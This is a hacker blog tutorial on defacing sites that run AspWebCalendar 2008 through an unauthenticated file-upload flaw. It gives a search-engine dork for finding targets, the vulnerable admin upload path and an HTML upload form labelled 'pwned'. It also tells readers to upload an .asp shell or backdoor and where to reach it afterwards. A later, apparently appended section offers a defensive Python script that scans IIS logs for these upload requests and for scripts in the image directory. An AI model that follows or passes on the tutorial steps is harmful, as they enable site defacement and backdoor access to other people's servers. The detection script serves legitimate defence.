Deface AspWebCalendar 2008 Remote File Upload Vulnerability - NTB4WORLD BLOG

NTB4WORLD BLOG

An IT community from Nusa Tenggara Barat


Tuesday, May 23, 2017

Deface AspWebCalendar 2008 Remote File Upload Vulnerability


Hello World; good afternoon fans, please say hello haters ^^
Nuenomaru here .-.
This time Nue is going to discuss and share a tutorial on the AspWebCalendar 2008 Remote File Upload Vulnerability exploit. *It's an old exploit, just sharing it for fun in case it still works.


Let's go straight to the tutorial :*


Dork: calendar.asp?eventdetail

1. Dork with a search engine, then pick the target site you want to go after.

Exploit: /path/calendar_admin.asp?action=uploadfile

2. Append the exploit path to the end of the target URL:
www.target.co.li/path/calendar_admin.asp?action=uploadfile

3. Vulnerable o.O ?? An upload form more or less appears *see the image


4. If you want to upload a shell, it's recommended to use a shell/backdoor with the .asp extension (in line with the title of this exploit), but this time I'm directly uploading a deface script with the .asp extension.


If you want to upload a shell/backdoor, use one with the .asp extension.

Shell/file access: /path/calendar/eventimages/yourshell.asp
www.target.co.li//path/calendar/eventimages/yourshell.asp


Yay, done~

Here's the CSRF upload form for those who need it:


<FORM ENCTYPE='multipart/form-data' METHOD='post' ACTION='http://HOST/PATH//calendar_admin.asp?action=uploadfileprocess&form=&element='>
<FONT COLOR='blue'>http://example.com/path/calendar/eventimages/</FONT><BR>
<INPUT TYPE=FILE SIZE=56 NAME='FILE1'><BR><BR>
<INPUT TYPE='submit' VALUE='pwned'>
</FORM>


Easy, right x_O ?
Stay Cool and Keep ./Crotz, guys <(")
Not clear enough? :/ Watch the video :)
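For site owners: both stages described above leave distinct entries in the IIS access log, namely a request to calendar_admin.asp with action=uploadfile or action=uploadfileprocess, and later a request for a script file under calendar/eventimages/. The following detection sketch is an added example, not part of the original post. It assumes W3C-format IIS logs with a #Fields header; the log lines, IP addresses, /cal prefix and file names are constructed sample data.

```python
import re

# Constructed sample in IIS W3C extended format (not real traffic).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2017-05-23 10:01:02 203.0.113.7 GET /cal/calendar.asp eventdetail=12 200
2017-05-23 10:01:40 203.0.113.7 GET /cal/calendar_admin.asp action=uploadfile 200
2017-05-23 10:02:05 203.0.113.7 POST /cal/calendar_admin.asp action=uploadfileprocess&form=&element= 200
2017-05-23 10:02:30 203.0.113.7 GET /cal/calendar/eventimages/upload1.asp - 200
2017-05-23 10:03:00 198.51.100.9 GET /cal/calendar/eventimages/party.jpg - 200
2017-05-23 10:04:00 198.51.100.9 GET /cal/Calendar_Admin.asp ACTION=UploadFile 302
"""

# The two upload actions named in the post, matched as a whole query parameter.
UPLOAD_ACTION = re.compile(r"(?:^|&)action=uploadfile(?:process)?(?:&|$)", re.I)
# Extensions commonly mapped to script handlers on IIS (classic ASP and ASP.NET).
SCRIPT_EXT = re.compile(r"\.(?:asp|asa|cer|cdx|aspx|ashx|asmx)$", re.I)


def scan(log_text):
    """Return a list of (rule, client_ip, method, uri_stem, status) findings."""
    fields, findings = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        stem = row.get("cs-uri-stem", "").lower()
        query = row.get("cs-uri-query", "")
        rule = None
        if stem.endswith("/calendar_admin.asp") and UPLOAD_ACTION.search(query):
            # GET reaches the upload form; POST means a file was submitted.
            rule = "upload-posted" if row.get("cs-method") == "POST" else "upload-form-probe"
        elif "/calendar/eventimages/" in stem and SCRIPT_EXT.search(stem):
            # The image directory should serve images only, never scripts.
            rule = "script-in-eventimages"
        if rule:
            findings.append((rule, row.get("c-ip"), row.get("cs-method"),
                             row.get("cs-uri-stem"), row.get("sc-status")))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="\t")
```

A 200 status on the upload-form-probe rule means the admin upload page answered without authentication; any script-in-eventimages hit warrants checking that directory on disk and removing script execution rights from it.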


